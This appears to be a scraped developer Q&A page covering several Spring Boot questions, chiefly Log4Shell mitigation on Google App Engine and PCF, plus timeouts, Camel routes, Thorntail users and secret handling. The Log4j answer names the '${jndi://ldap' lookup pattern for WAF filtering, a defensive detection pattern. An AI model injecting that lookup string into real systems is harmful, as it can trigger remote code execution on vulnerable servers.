Log4j Vulnerability (CVE-2021-44228) on Google Cloud Platform and PCF - spring-boot

Currently there are so many suggested steps that have been posted for excluding log4j-core library from dependency or upgrading to the latest (above version 2.15) version according to Spring Blog . Are there any recommended tools that can be used for protecting spring application deployed in Google App Engine or Pivotal Cloud Foundry(PCF) for protecting instead of patching them for redeployment?
Another necessary question is, does it make my application(microservice spring application) to be vulnerable if it uses another microservice for some of its service if it depends on another microservice and if that microservice already uses vulnerable version of log4j-core?

In regard to your first question, you can set an environment variable in order to disable the replacement lookups in log4j:
LOG4J_FORMAT_MSG_NO_LOOKUPS=true
Please note that this only works for log4j >= 2.10.
I believe you can set environment variables in PCF without having to redeploy the service (of course, a restart would be needed), so no new release would be needed. See: https://docs.pivotal.io/pivotalcf/2-3/devguide/deploy-apps/environment-variable.html and https://cli.cloudfoundry.org/en-US/v6/set-env.html
In order to see whether your spring-boot application is vulnerable to the exploit, you could use a spring-boot test I created for that purpose: https://github.com/chilit-nl/log4shell-example - You could test your application with and without the environment variable, to see if it has any effect (assuming that your application currently is vulnerable).

Short answer to your first question is may be. You can protect your application/service by using rules in WAF to discard the ${jndi://ldap pattern. However, there are so many mutations of this (base64 encoding etc.) that it will not be foolproof. If you are worried about dependencies, you should set the JVM Parameter and redeploy your app to prevent the lookup as a workaround.
Regarding your 2nd question - the answer is yes if the the 2nd micro service is being passed the same input and it's logging.

Related

deprecated property: connection-timeout: 12000

I have this property into Spring Boot application:
server:
connection-timeout: 12000
I get warning:
Deprecated Each server behaves differently. Use server specific properties instead.
Gradle: org.springframework.boot:spring-boot-autoconfigure:2.6.8 (spring-boot-autoconfigure-2.6.8.jar)
is there some better configuration property that I can use?
I don't even know why you receive a deprecated warning.
According to the documentation from Spring Boot version 2.3 and onwards this property is removed not deprecated any more.
As you can read here, there are some other properties which you can use instead depending on the server that runs your spring boot application.
server.tomcat.connection-timeout should be used if you have tomcat as running server.
server.netty.connection-timeout should be used if netty is used.
server.jetty.connection-idle-timeout should be used if jetty is used
Basically each server has it's own implementation, so you must read your server's documentation to see what it allows and how this behaves. There might be slight differences from how one server behaves and how it interprets connection-timeout and how another server behave and interprets a similar configuration.
This is I think the reason that Spring decides to move to server specific configuration on property connection-timeout instead of a general property and also a very important reason was that some servers may not even have this configuration available to them. So then you have a general property configured in your spring boot application which the server that runs the application can't even respect.
Therefore you now have specific properties for specific servers and now you can be sure upfront whether this configuration is available in your server and you can also read the server documentation to understand exactly what the behavior will be.
Although this setting is being deprecated, we still can use the timeout function.
According to official document, we can use #Transactional(timeout = 1) to do the track in the controller
https://www.baeldung.com/spring-rest-timeout

Dynamic Camel route configuration at deployment time: Java DSL or XML DSL?

Let me preface this with the fact that I am still very new to Apache Camel. I'm still trying to understand how it all works, and what needs to be done (and HOW to do it) to achieve a particular effect.
I am trying to develop a Spring Boot application that will use Apache Camel to handle the transmission (and possibly also receipt) of data to/from a number of possible sources and destinations. The purpose of the application is to provide a means to produce/generate network traffic, at the network application level, that will be fed into another Spring Boot application - let's call this the target. We are trying to observe and measure the effects various network loads have on the target.
We would like to be able to transmit data via a number of protocols, including: ftp, http/s, file systems (nfs), various mail protocols (smtp, pop) and data streaming protocols for voice and video. There may be other protocols added at a later time. The data itself is irrelevant, we just need to be able to transmit data via various protocols with various loads.
These applications/services will be running in a containerized environment (Docker) that will be run within our local development and test environment, as well as possibly in a cloud environment, such as AWS. We have used Docker, Ansible, Terraform and are currently working towards using Kubernetes and Istio to manage the configuration, deployment, and operation of these applications.
We need to be able to provide specific configurations of Camel routes for particular deployments.
It would appear that the preferred method to configure Camel routes is via Java DSL, rather than XML DSL. The Camel documentation and nearly every other source of information I've found have a strong bias towards using Java DSL. Examples of XML DSL route configuration are far and few.
My initial impression is that going the Java DSL route (excuse the pun), would not work well with our need to be able to deploy a Camel application with a specific route configuration. It seems like you are required to have Java DSL defined route configurations hardwired into the code.
We think that it will be easier to provide a specific route configuration via an XML file that can be included in a deployment, hence why I've been trying to investigate and experiment with XML DSL. Perhaps we are mistaken in this regard.
My question to the community is: Considering what I've described above, can the Java DSL approach be used to meet the requirements as I've described them? Can we use Java DSL in a way that allows for dynamic route configuration? Keep in mind we would not be attempting to change configuration during operation, just in the course of performing a deployment.
If Java DSL could be used for this purpose, it would be very much appreciated if pointers to documentation, examples, etc. could be provided.
For your use cases you could use XML DSL also. Anyhow below book covers most aspects Camel development with examples. In this book authors describes XML DSL use for most of java DSL examples.
https://www.manning.com/books/camel-in-action-second-edition
In below github repository you can find the source code for all the examples listed in above book.
https://github.com/camelinaction/camelinaction2
Simple tutorial and github repository for Apache Camel using Spring boot.
https://www.baeldung.com/apache-camel-spring-boot
https://github.com/eugenp/tutorials/tree/master/spring-boot-modules/spring-boot-camel
Maven Plugin for build and deployment of spring boot container application into Kubernetes cluster
https://maven.fabric8.io/
In case if your company can afford some funding for your effort look at below link which provides commercial offerings around Camel.
https://camel.apache.org/manual/latest/commercial-camel-offerings.html
Thanks
Madhu Gupta
Our team has a few projects which use the Java DSL for building routes. In order to make them dynamic, there are control structures for iterating and setting endpoints based off configurations. That works for us because the routes are basically all the same, just with different sources and sinks.
If you could dynamically add/change the XML DSL files in a way that doesn't involve redeploying your application, that might be a viable route to follow. One might, for example, change the camel.springboot.xml-routes property to point to a folder which changes as needed.

What is the simplest way to add application users in a Thorntail WildFly server?

As said in the title, is there a way to add application users in Thorntail WilFly server, much like you would do with "add-user.sh -a" script in the full server distribution?
I understand you can provide an external configuration file to Thorntail but that seems a bit of overhead just for specifying where users are located.
Thanks
The answer by Thomas Herzog is very good from a conceptual point of view -- I'd especially agree with securing the application using an external Keycloak, potentially with the help of MicroProfile JWT. I'm just gonna provide a few points in case you decide not to.
You can define users directly in project-defaults.yml, like this:
thorntail:
management:
security-realms:
ApplicationRealm:
in-memory-authentication:
users:
bob:
password: tacos!
in-memory-authorization:
users:
bob:
roles:
- admin
The project-defaults.yml file doesn't have to be external to the app, you can build it directly into it. Typically, in your source code, the file will be located in src/main/resources, and after building, it will be embedded inside the -thorntail.jar. It can be external, of course, and if this is something else than a throwaway prototype or test, sensitive data like this should be external.
You can also use the .properties files from WildFly:
thorntail:
management:
security-realms:
ApplicationRealm:
properties-authentication:
path: .../path/to/application-users.properties
properties-authorization:
path: .../path/to/application-roles.properties
It depends on for what you need the users? Thorntail creates standalone Microservices, which are different to hosted applications in a wildfly-server.
Is there are a management console in thorntail?
Yes there is, but I have never used it.
https://docs.thorntail.io/2.2.0.Final/#_management
https://docs.thorntail.io/2.2.0.Final/#_management_console
The users you maybe able to create there shouldn't be persistent, because there is no wildfly-server installation as you are used to with a standalone wildfly-server installation, it is all packaged in the jar. A Microservice shouldn't need to be configured after its deployment anymore, at least not like this.
How to secure my application?
I would recommend to use an external user management via keycloak, which is integrated in thorntail via the keycloak fraction. With the keycloak fraction you can define security constraints to your endpoints similar in a web.xml.
https://docs.thorntail.io/2.2.0.Final/#_keycloak
Another way is to use the security fraction which provides you JAAS support for your microservice.
https://docs.thorntail.io/2.2.0.Final/#_security
The configuration is done via the thorntail specific project-defaults.yml configuration file, where you can configure the fractions via YAML.
What is a thorntail fraction?
A thorntail fraction is similar to a spring boot start dependency with spring, whereby the fraction provides the API for the developement and bundles the implementation and integration into thorntail. The fraction actually is a jboss module which is packaged into the standalone Microservice during re-packaging phase.
Where can I find examples?
See the following links for examples how to use security in thorntail. You should take a look at them.
https://github.com/thorntail/thorntail-examples/tree/master/security
Take a look at the src/main/resources/projects-defaults.yml which contains the configuration for thorntail fractions and the pom.xml which defines the used fractions.

Spring Boot best practices for hiding or encrypting passwords

I have been using the Spring Framework for about 4 years now, and now Spring Boot for the last couple of months. My Spring MVC applications are usually deployed on a Java EE container such as JBoss/WildFly or WebLogic. Doing so allows me to use JNDI for things like datasources or any other sensitive data that involve secrets/passwords. That makes my app "consume" that JNDI resource based on its name.
Now with Spring Boot and especially for self-contained microservices (embedded tomcat), that information is now stored within the application (application.properties and/or in Spring Java Config classes), so versioned in Git.
That makes that information a lot more exposed to other developers, which I'm not very comfortable with. I also don't like having those details show up in SonarQube and Jenkins (through workspaces).
Question is: Are there any best practices for this specific requirement?
* UPDATE *
I see some articles here and there about the use of Jasypt, but I wonder if it's still a valid library to use since the last stable release is dated from 2014.
Thank you
You could consider using a vault. Spring supports a few of them out of the box. You can find more information here http://projects.spring.io/spring-vault/.
If you have spring cloud in your stack, then it's very easy. Use encrypt the value and put it in the application properties. Follow the instruction mentioned here.
Other way is, set the values as environmental variables and using the environmental variables in the application properties. Instructions here

Update for JavaEE application

Our application are built on Spring boot, the app will be packaged to a war file and ran with java -jar xx.war -Dspring.profile=xxx. Generally the latest war package will served by a static web server like nginx.
Now we want to know if we can add auto-update for the application.
I have googled, and people suggested to use the Application server which support hot deployment, however we use spring boot as shown above.
I have thought to start a new thread once my application started, then check update and download the latest package. But I have to terminate the current application to start the new one since they use the same port, and if close the current app, the update thread will be terminated too.
So how to you handle this problem?
In my opinion that should be managed by some higher order dev-ops level orchestration system not by either the app nor its container. The decision to replace an app should not be at the dev-ops level and not the app level
One major advantage of spring-boot is the inversion of the traditional application-web-container to web-app model. As such the web container is usually (and best practice with Spring boot) built within the app itself. Hence it is fully self contained and crucially immutable. It therefore should not be the role of the app-web-container/web-app to replace either part-of or all-of itself.
Of course you can do whatever you like but you might find that the solution is not easy because it is not convention to do it in this way.

Resources